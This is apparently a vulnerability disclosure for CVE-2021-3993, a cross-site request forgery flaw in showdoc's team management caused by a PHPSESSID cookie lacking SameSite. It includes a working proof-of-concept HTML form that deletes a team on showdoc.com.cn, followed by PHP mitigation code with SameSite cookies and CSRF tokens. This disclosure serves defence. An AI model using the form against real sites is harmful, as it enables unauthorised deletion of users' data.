Headline
CVE-2021-3993: Cross-Site Request Forgery (CSRF) in showdoc
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
Description
You set the Strict flag only for one of your cookies, the one named cookie_token, but in Team management an attacker can still delete or add teams through CSRF because the cookie named PHPSESSID does not have the Strict flag.
Proof of Concept
1. Replace 38046 with the team id.
2. Open poc.html and click on the submit button.
3. After that, the team with id 38046 (or your replaced team id) will be deleted.
//poc.html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
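A server-side mitigation for the issue described above, as an added example that is not showdoc's code: the PHP session cookie gets the same SameSite protection as cookie_token, and the team management endpoints verify a per-session token. The function names and the JSON error format are assumptions.

```php
<?php
// Added example, not showdoc's code: give the PHP session cookie (PHPSESSID) the
// same SameSite protection as cookie_token and require a per-session token on
// state-changing requests such as the team add/delete endpoints.
// PHP 7.3+ options-array form; 'samesite' cannot be set with the older signature.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',        // assumption: current host only
    'secure'   => true,      // send only over HTTPS
    'httponly' => true,      // not readable from JavaScript
    'samesite' => 'Strict',  // browser omits the cookie on cross-site POSTs (Lax also does)
]);
session_start();
// One random token per session, embedded as a hidden field in every form
// that performs a state change.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_token_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Hidden field to place inside the team management forms.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Guard to run first in /api/team/delete (and the add endpoint); this server-side
// check also holds for clients that ignore SameSite. Response format is assumed.
function require_csrf_token(array $post): bool
{
    if (csrf_token_valid($post['csrf_token'] ?? null)) {
        return true;
    }
    http_response_code(403);
    header('Content-Type: application/json');
    echo json_encode(['error_code' => 403, 'error_message' => 'invalid CSRF token']);
    return false;
}
```

Call require_csrf_token($_POST) before the delete logic runs and render csrf_field() inside the team forms. SameSite=Lax would already keep the cookie off the cross-site POST in this report; Strict additionally drops it on cross-site top-level navigations.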
Occurrences